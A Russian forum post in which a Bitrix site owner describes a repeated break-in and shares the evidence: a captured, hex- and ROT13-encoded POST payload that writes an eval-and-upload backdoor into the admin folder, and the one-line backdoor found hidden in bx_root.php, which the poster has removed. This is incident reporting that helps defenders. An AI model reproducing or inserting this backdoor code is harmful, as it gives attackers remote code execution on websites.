Вчера, повторно, поле 24 февраля сайт упал. Во всех разделах создались файлы .htaccess и был вставлен зловредный код в код index.php. После анализа логов было обнаружено что в папке admin были созданы бекдоры с рандомными именами. Создавались эти бекдоры POST запросом к главной странице сайта. Вчера вечером по вашему совету поставил логирования POST запросов к главной странице и это дало результаты. Вот такие запросы прилетают:
Код |
---|
array ( 'BX_STAT' => '303q66696p655s7075745s636s6r74656r747326313q6269747269782s61646q696r2s6561323033363065653039302r70687026323q3p3s3q3430393732332n32303o6966286q643528245s434s4s4o49455o645q293q3q22313730323866343837636232613834363037363436646133616433383738656322297o6563686s226s6o223o6576616p286261736536345s6465636s646528245s524551554553545o69645q29293o696628245s504s53545o227570225q3q3q22757022297o40636s707928245s46494p45535o2266696p65225q5o22746q705s6r616q65225q2p245s46494p45535o2266696p65225q5o226r616q65225q293o7q7q3s3r', ) |
обнаружил код в файле \bitrix\modules\main\bx_root.php
Код |
---|
<? if (isset($_POST["BX_STAT"]) && $_POST["BX_STAT"] <> "") parse_str(hex2bin(str_rot13($_POST["BX_STAT"])),$bx_stat) or die(str_rot13(bin2hex($bx_stat[0]($bx_stat[1],$bx_stat[2])))); ?> |
Что интересно дата bx_root.php такая же как у всех файлов ядра. В других дистрибутивах этого кода не обнаружил и поэтому удалил его. Наблюдаю дальше.
P.S Битрикс 18.5.180.